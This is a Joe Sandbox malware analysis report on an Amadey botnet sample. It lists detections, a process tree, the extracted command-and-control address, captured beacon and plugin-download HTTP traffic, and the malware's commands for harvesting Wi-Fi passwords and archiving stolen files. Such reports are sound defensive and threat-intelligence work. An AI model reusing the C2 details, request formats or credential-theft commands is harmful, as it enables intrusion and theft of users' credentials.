Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe
Analysis ID:1428513
MD5:6afd3b5b7effe4bb0500fe08dd1f6ed7
SHA1:c0b8d6e8b660aa79851bd237c162ed437d3c047c
SHA256:441adf73dcc0324843d1e42824e7e9473960c859c748a87ac7af4460535aaf2f
Tags:Amadeyexe
Infos:

Detection

Amadey
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadeys Clipper DLL
Yara detected Amadeys stealer DLL
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Uses netsh to modify the Windows network and firewall settings
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe (PID: 6484 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe" MD5: 6AFD3B5B7EFFE4BB0500FE08DD1F6ED7)
    • explorha.exe (PID: 1668 cmdline: "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe" MD5: 6AFD3B5B7EFFE4BB0500FE08DD1F6ED7)
  • explorha.exe (PID: 7068 cmdline: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe MD5: 6AFD3B5B7EFFE4BB0500FE08DD1F6ED7)
  • explorha.exe (PID: 5900 cmdline: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe MD5: 6AFD3B5B7EFFE4BB0500FE08DD1F6ED7)
    • rundll32.exe (PID: 4408 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 6960 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main MD5: EF3179D498793BF4234F708D3BE28633)
        • netsh.exe (PID: 1888 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • conhost.exe (PID: 2208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1244 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 6916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 6704 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": ["193.233.132.56/Pneh2sXQk0/index.php"]}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dllJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
    C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dllJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dllJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dllJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dllJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            Click to see the 1 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            0000000B.00000002.3040424811.000000006C981000.00000020.00000001.01000000.0000000B.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              00000000.00000003.1798578952.0000000005450000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  00000006.00000003.2311033083.00000000047E0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      Click to see the 4 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      11.2.rundll32.exe.6c980000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                        11.2.rundll32.exe.6c980000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                          6.2.explorha.exe.860000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                            2.2.explorha.exe.860000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                              0.2.SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe.e10000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                                Click to see the 1 entries

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: Suspicious Script Execution From Temp Folder
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 6960, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 1244, ProcessName: powershell.exe
                                Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
                                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 6960, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 1244, ProcessName: powershell.exe
                                Sigma detected: Non Interactive PowerShell Process Spawned
                                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 6960, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 1244, ProcessName: powershell.exe

                                Stealing of Sensitive Information

                                barindex
                                Sigma detected: Capture Wi-Fi password
                                Source: Process startedAuthor: Joe Security: Data: Command: netsh wlan show profiles, CommandLine: netsh wlan show profiles, CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 6960, ParentProcessName: rundll32.exe, ProcessCommandLine: netsh wlan show profiles, ProcessId: 1888, ProcessName: netsh.exe

                                Snort Signatures

                                Timestamp:04/19/24-04:26:07.803129
                                SID:2855239
                                Source Port:49742
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/19/24-04:26:03.920797
                                SID:2856147
                                Source Port:49735
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/19/24-04:26:08.422562
                                SID:2856151
                                Source Port:49744
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Antivirus / Scanner detection for submitted sample
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeAvira: detected
                                Antivirus detection for URL or domain
                                Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
                                Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
                                Antivirus detection for dropped file
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dllAvira: detection malicious, Label: TR/ClipBanker.pjgxt
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dllAvira: detection malicious, Label: TR/PSW.Agent.szlsq
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dllAvira: detection malicious, Label: TR/ClipBanker.pjgxt
                                Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dllAvira: detection malicious, Label: TR/PSW.Agent.szlsq
                                Found malware configuration
                                Source: 11.2.rundll32.exe.6c980000.0.unpackMalware Configuration Extractor: Amadey {"C2 url": ["193.233.132.56/Pneh2sXQk0/index.php"]}
                                Multi AV Scanner detection for domain / URL
                                Source: http://193.233.132.56/Pneh2sXQk0/index.phpgVirustotal: Detection: 5%Perma Link
                                Source: http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dllvVirustotal: Detection: 20%Perma Link
                                Source: http://193.233.132.56/lVirustotal: Detection: 18%Perma Link
                                Source: http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dllVirustotal: Detection: 20%Perma Link
                                Source: http://193.233.132.56/Pneh2sXQk0/index.phpVirustotal: Detection: 20%Perma Link
                                Source: http://193.233.132.56/Pneh2sXQk0/index.php3Virustotal: Detection: 5%Perma Link
                                Source: http://193.233.132.56/Pneh2sXQk0/Plugins/cred64.dllVirustotal: Detection: 21%Perma Link
                                Source: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1sVirustotal: Detection: 19%Perma Link
                                Source: http://193.233.132.56/Virustotal: Detection: 19%Perma Link
                                Multi AV Scanner detection for dropped file
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dllReversingLabs: Detection: 71%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dllVirustotal: Detection: 78%Perma Link
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dllReversingLabs: Detection: 81%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dllVirustotal: Detection: 80%Perma Link
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeReversingLabs: Detection: 44%
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeVirustotal: Detection: 54%Perma Link
                                Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dllReversingLabs: Detection: 81%
                                Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dllVirustotal: Detection: 80%Perma Link
                                Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dllReversingLabs: Detection: 71%
                                Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dllVirustotal: Detection: 78%Perma Link
                                Multi AV Scanner detection for submitted file
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeReversingLabs: Detection: 44%
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeVirustotal: Detection: 54%Perma Link
                                Machine Learning detection for dropped file
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeJoe Sandbox ML: detected
                                Machine Learning detection for sample
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeJoe Sandbox ML: detected
                                Sample uses string decryption to hide its real strings
                                Source: 11.2.rundll32.exe.6c980000.0.unpackString decryptor: 193.233.132.56
                                Source: 11.2.rundll32.exe.6c980000.0.unpackString decryptor: /Pneh2sXQk0/index.php
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64[1].dll.6.dr, cred64.dll.6.dr
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\OneDrive\desktop.iniJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Videos\desktop.iniJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Music\desktop.iniJump to behavior

                                Networking

                                barindex
                                Snort IDS alert for network traffic
                                Source: TrafficSnort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.4:49735 -> 193.233.132.56:80
                                Source: TrafficSnort IDS: 2855239 ETPRO TROJAN Win32/Amadey Stealer Activity M4 (POST) 192.168.2.4:49742 -> 193.233.132.56:80
                                Source: TrafficSnort IDS: 2856151 ETPRO TROJAN Amadey CnC Activity M7 192.168.2.4:49744 -> 193.233.132.56:80
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 193.233.132.56 80Jump to behavior
                                C2 URLs / IPs found in malware configuration
                                Source: Malware configuration extractorIPs: 193.233.132.56
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 02:26:04 GMTContent-Type: application/octet-streamContent-Length: 1285632Last-Modified: Sun, 03 Mar 2024 11:54:33 GMTConnection: keep-aliveETag: "65e464f9-139e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 de c9 0d 82 bf a7 5e 82 bf a7 5e 82 bf a7 5e d9 d7 a3 5f 91 bf a7 5e d9 d7 a4 5f 92 bf a7 5e d9 d7 a2 5f 32 bf a7 5e 57 d2 a2 5f c4 bf a7 5e 57 d2 a3 5f 8d bf a7 5e 57 d2 a4 5f 8b bf a7 5e d9 d7 a6 5f 8f bf a7 5e 82 bf a6 5e 43 bf a7 5e 19 d1 ae 5f 86 bf a7 5e 19 d1 a7 5f 83 bf a7 5e 19 d1 58 5e 83 bf a7 5e 19 d1 a5 5f 83 bf a7 5e 52 69 63 68 82 bf a7 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 69 12 e4 65 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 18 00 c0 0f 00 00 52 04 00 00 00 00 00 68 06 0d 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 14 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 89 12 00 58 00 00 00 78 89 12 00 8c 00 00 00 00 20 14 00 f8 00 00 00 00 60 13 00 28 ad 00 00 00 00 00 00 00 00 00 00 00 30 14 00 f4 15 00 00 b0 9e 11 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 9f 11 00 08 01 00 00 00 00 00 00 00 00 00 00 00 d0 0f 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 be 0f 00 00 10 00 00 00 c0 0f 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 cd 02 00 00 d0 0f 00 00 ce 02 00 00 c4 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c bb 00 00 00 a0 12 00 00 44 00 00 00 92 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 28 ad 00 00 00 60 13 00 00 ae 00 00 00 d6 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 94 00 00 00 00 10 14 00 00 02 00 00 00 84 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 20 14 00 00 02 00 00 00 86 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f4 15 00 00 00 30 14 00 00 16 00 00 00 88 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 02:26:07 GMTContent-Type: application/octet-streamContent-Length: 112128Last-Modified: Sun, 03 Mar 2024 11:54:32 GMTConnection: keep-aliveETag: "65e464f8-1b600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 f6 04 b3 63 97 6a e0 63 97 6a e0 63 97 6a e0 38 ff 69 e1 69 97 6a e0 38 ff 6f e1 eb 97 6a e0 38 ff 6e e1 71 97 6a e0 b6 fa 6e e1 6c 97 6a e0 b6 fa 69 e1 72 97 6a e0 b6 fa 6f e1 42 97 6a e0 38 ff 6b e1 64 97 6a e0 63 97 6b e0 02 97 6a e0 f8 f9 63 e1 60 97 6a e0 f8 f9 6a e1 62 97 6a e0 f8 f9 95 e0 62 97 6a e0 f8 f9 68 e1 62 97 6a e0 52 69 63 68 63 97 6a e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 6a 12 e4 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 24 01 00 00 9a 00 00 00 00 00 00 ec 66 00 00 00 10 00 00 00 40 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 a1 01 00 9c 00 00 00 bc a1 01 00 50 00 00 00 00 d0 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 d4 14 00 00 f0 8f 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 90 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 23 01 00 00 10 00 00 00 24 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 69 00 00 00 40 01 00 00 6a 00 00 00 28 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 1c 17 00 00 00 b0 01 00 00 0c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 d0 01 00 00 02 00 00 00 9e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 14 00 00 00 e0 01 00 00 16 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: GET /Pneh2sXQk0/Plugins/cred64.dll HTTP/1.1Host: 193.233.132.56
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
